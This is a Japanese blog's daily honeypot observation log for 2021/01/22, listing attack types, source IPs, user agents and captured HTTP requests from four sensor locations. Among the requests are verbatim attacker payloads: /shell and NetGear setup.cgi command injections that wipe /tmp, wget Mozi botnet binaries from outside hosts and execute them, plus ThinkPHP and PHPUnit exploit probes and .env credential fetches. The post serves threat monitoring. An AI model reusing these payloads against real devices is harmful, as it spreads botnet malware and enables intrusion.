コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/01/22 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/01/22分です。

特徴
Location:JP

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
110[.]242[.]68[.]4に関する不正通信
を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  debes.venus.lol/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget http[:]//59[.]88[.]230[.]31:49909/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

アクセス数推移

JP:総アクセス数:99 (前日比:-64)
US:総アクセス数:74 (前日比:+38)
UK:総アクセス数:69 (前日比:-91)
SG:総アクセス数:59 (前日比:-16)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.8.10.202 Russia
3 5.239.241.101 Iran
3 8.130.27.120 Singapore
3 13.71.29.127 United States
3 13.127.43.192 United States
1 20.43.35.19 United States
1 45.148.10.61 Romania
20 45.155.205.108 Russia
3 46.41.141.30 Poland
1 47.114.121.183 China
4 51.75.64.21 France
1 51.105.58.200 United Kingdom
1 52.149.228.223 United States
1 54.88.86.42 United States
1 63.143.61.42 United States
2 94.232.47.170 Russia
3 101.200.213.39 China
1 112.193.169.123 China
3 114.67.103.47 China
1 119.118.23.220 China
1 143.244.44.203 United Kingdom
1 147.135.115.235 United States
1 149.28.81.44 United States
1 172.105.89.161 United States
3 180.76.163.8 China
1 185.179.29.235 Albania
1 185.239.242.162 Netherlands
24 188.165.169.140 France
1 194.61.55.248 Russia
1 205.185.123.76 United States
4 209.141.58.184 United States
2 209.141.60.195 United States
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
30 -
7 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.01678543 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
1 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
4 ZmEu
1 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
14 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /info HTTP/1.1
8 GET /jenkins/login HTTP/1.0
8 GET /login HTTP/1.0
8 GET /manager/html HTTP/1.0
1 GET /manager/html/ HTTP/1.0
2 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
6 GET /public/.env HTTP/1.1
1 GET /server-status HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
6 GET /storage/.env HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
6 GET /vendor/.env HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
1 20.43.35.19 United States
3 34.213.193.81 United States
20 45.155.205.108 Russia
3 47.96.236.121 China
3 47.114.39.206 China
3 52.228.45.112 United States
3 52.247.113.40 United States
1 54.149.34.147 United States
1 59.99.141.35 India
1 60.13.6.127 China
1 60.216.134.220 China
1 63.143.61.42 United States
1 71.78.121.66 United States
1 94.232.47.160 Russia
3 101.201.57.51 China
1 103.28.70.87 United States
1 103.75.219.130 Singapore
3 107.151.198.26 United States
3 118.190.39.135 China
3 120.78.231.81 China
3 121.89.166.69 China
3 121.171.33.120 South Korea
1 152.32.187.22 Hong Kong
1 172.104.242.173 United States
3 180.76.163.8 China
1 185.239.242.162 Netherlands
1 202.164.138.223 India
3 209.141.60.195 United States

UserAgent一覧

件数 UserAgent
43 -
1 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 polaris botnet

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
12 GET /jenkins/login HTTP/1.0
12 GET /login HTTP/1.0
12 GET /manager/html HTTP/1.0
1 GET /manager/html/ HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]75[.]219[.]130:53148/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.43.35.19 United States
3 39.108.71.230 China
1 41.47.193.175 Egypt
1 45.148.10.61 Romania
20 45.155.205.108 Russia
1 47.104.223.14 China
6 47.105.181.38 China
3 47.114.107.252 China
1 59.88.230.31 India
1 59.92.179.114 India
3 62.234.36.161 China
1 63.143.61.42 United States
1 78.128.113.18 Bulgaria
3 106.52.157.69 China
1 112.232.238.11 China
1 119.23.224.72 China
1 119.56.185.4 South Korea
1 119.118.7.103 China
1 120.35.40.169 China
1 120.78.202.155 China
1 121.57.228.94 China
1 121.237.169.146 China
1 123.158.49.135 China
1 172.93.102.236 United States
1 172.104.242.173 United States
1 172.105.67.149 United States
1 172.105.89.161 United States
1 175.152.31.73 China
1 178.54.86.113 Ukraine
1 178.254.38.64 Germany
1 180.95.231.208 China
1 182.138.137.106 China
1 185.239.242.162 Netherlands
2 209.141.60.195 United States
1 220.200.158.107 China
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
29 -
2 Go-http-client/1.1
1 Hello, world
5 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 curl/7.47.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x03
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
2 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
6 GET /jenkins/login HTTP/1.0
6 GET /login HTTP/1.0
6 GET /manager/html HTTP/1.0
2 GET /manager/html/ HTTP/1.0
1 GET /manager/html/ HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//59[.]88[.]230[.]31:49909/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD /robots.txt HTTP/1.0
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 23.98.134.147 United States
1 27.217.144.196 China
1 45.143.147.38 United States
1 45.148.10.61 Romania
20 45.155.205.108 Russia
1 54.149.34.147 United States
1 63.143.61.42 United States
3 65.1.31.163 United States
1 78.128.113.18 Bulgaria
2 85.215.93.28 Germany
3 101.200.50.244 China
3 106.54.179.57 China
1 115.61.116.253 China
3 118.26.39.100 Hong Kong
3 118.114.96.125 China
1 123.58.210.35 Hong Kong
3 139.159.220.178 China
1 151.248.116.75 Russia
1 172.104.26.161 United States
1 172.105.89.161 United States
2 209.141.58.184 United States
3 209.141.60.195 United States
1 211.226.211.8 South Korea
1 222.186.136.150 China

UserAgent一覧

件数 UserAgent
25 -
2 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
20 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
2 ZmEu

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 CONNECT ip[.]ws[.]126[.]net:443 HTTP/1.1
4 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /index.php?plot=;cd /tmp;
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
6 GET /jenkins/login HTTP/1.0
6 GET /login HTTP/1.0
6 GET /manager/html HTTP/1.0
1 GET /manager/html/ HTTP/1.0
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
1 GET http[:]//www[.]naver[.]com/ HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 HEAD http://www.google.com HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf